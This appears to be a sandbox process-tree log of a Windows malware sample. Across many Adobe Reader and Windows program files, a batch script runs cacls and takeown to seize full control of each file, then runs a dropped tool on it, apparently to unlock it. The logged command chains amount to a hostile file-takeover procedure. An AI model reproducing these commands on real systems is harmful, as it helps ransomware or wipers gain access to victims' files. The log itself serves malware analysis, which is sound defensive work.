C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:1344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:896
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:380
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:1168
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:1808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵
- Modifies file permissions
PID:484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "brt55.ths" -nobanner3⤵PID:1260
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "brt55.ths" -nobanner4⤵PID:756
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "engphon.env" -nobanner3⤵PID:2016
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "engphon.env" -nobanner4⤵PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:1412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:1580
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:1892
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:1948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:1372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:1888
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:1788
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:300
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵
- Modifies file permissions
PID:1912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:1080
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""2⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"3⤵PID:1892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Journal.exe.mui" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Journal.exe.mui" -nobanner4⤵PID:1404
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""2⤵PID:1904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C3⤵PID:932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"3⤵PID:1772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Genko_1.jtp" -nobanner3⤵PID:916
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Genko_1.jtp" -nobanner4⤵PID:484
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""2⤵PID:1840
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"3⤵
- Modifies file permissions
PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "To_Do_List.jtp" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "To_Do_List.jtp" -nobanner4⤵PID:928
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:1580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵
- Modifies file permissions
PID:916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵PID:972
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:1236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵PID:1376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "LogTransport2.exe" -nobanner3⤵PID:280
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "LogTransport2.exe" -nobanner4⤵PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:1860
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵
- Modifies file permissions
PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:1096
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "email_all.gif" -nobanner3⤵PID:1080
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "email_all.gif" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:2016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "info.gif" -nobanner3⤵PID:1404
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "info.gif" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "review_browser.gif" -nobanner3⤵PID:1888
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "review_browser.gif" -nobanner4⤵PID:900
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:1372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:236
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:484
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:1204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵PID:1772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:1412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵
- Modifies file permissions
PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "SC_Reader.exe" -nobanner3⤵PID:1800
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "SC_Reader.exe" -nobanner4⤵PID:1260
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:1860
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:1780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "brt04.hsp" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "brt04.hsp" -nobanner4⤵PID:932
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:1816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:1960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵
- Modifies file permissions
PID:1128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "eng.hyp" -nobanner3⤵PID:1952
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "eng.hyp" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:1324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵
- Modifies file permissions
PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CP1252.TXT" -nobanner3⤵PID:1468
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CP1252.TXT" -nobanner4⤵PID:1080
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:1912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "wabmig.exe" -nobanner3⤵PID:484
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "wabmig.exe" -nobanner4⤵PID:1936
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:1820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵PID:1752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:1780
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1128
-
-
-
